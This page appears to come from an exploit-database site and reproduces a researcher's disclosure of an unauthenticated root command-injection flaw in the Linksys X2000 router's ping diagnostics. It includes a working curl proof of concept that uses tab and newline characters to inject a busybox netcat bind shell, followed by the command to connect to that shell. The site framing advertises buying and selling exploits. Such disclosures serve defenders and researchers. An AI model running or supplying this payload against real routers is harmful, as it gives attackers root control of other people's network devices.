0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Linksys X2000 Command Execution Vulnerability
Hello, I have found on my router, a Linksys X2000, that there is a poor validation of the IP target in the ping diagnostics web page (http://$router_ip/Diagnostics.asp). This can be used to execute arbitrary commands as the root user on the device. It appears that there is no need for authentication to exploit the flaw, so this is exploitable from WAN if the administrator has activated remote management from the web UI. The web interface is managed by process /bin/httpd. The diagnostic web pages accepts an user-supplied IP to run a ping test on it. This user value is truncated at the first occurrence of the characters " ;<>" in an attempt to make the user-provided string safe when appended to "/bin/ping " and passed to system(). However, this is not sufficient at all to prevent the injection of shell commands. In fact, spaces for arguments separation can be replaced by tabs and semicolons with new lines. This allows arbitrary remote command execution with root privileges. To exacerbate the issue, it appears that there is no need for any authentication to trigger the ping diagnostic. I have tested this on LAN and it works. Regarding remote access, I failed to get remote access to work at all, because for some reason when I enable it a rule to the nat table is inserted to drop packets directed to the web interface, before the rule that honors the "Remote Management Port" field in the web configuration. I do not know why this happens and if it is intended behavior. However, by using the root shell from LAN to remove this iptables entry, I could successfully exploit the flaw from WAN too. This is the POC: #activate the shellby requesting a ping test to a special ip string ("busybox nc -e /bin/sh -l -p 1234") curl -s \ --data submit_button=Diagnostics \ --data change_action=gozila_cgi \ --data submit_type=start_ping \ --data action= \ --data commit=0 \ --data nowait=1 \ --data ping_size=32 \ --data ping_times=5 \ --data-urlencode ping_ip=$'\nbusybox\tnc\t-e\t/bin/sh\t-l\t-p\t1234' $router_ip/apply.cgi >/dev/null & #access the shell nc $router_ip 1234 #now can execute any non-interactive shell command I suspect that there are similar issues with the traceroute diagnostic, and in adding port forwarding entries. A more blog-y description of the issue, including the assembly locations that fail to properly sanitize the user value, can be found here http://meat.pisto.horse/2015/11/rooting-linksys-x2000-router-system.html Cheers. Lorenzo Pistone # 0day.today [2024-11-15] #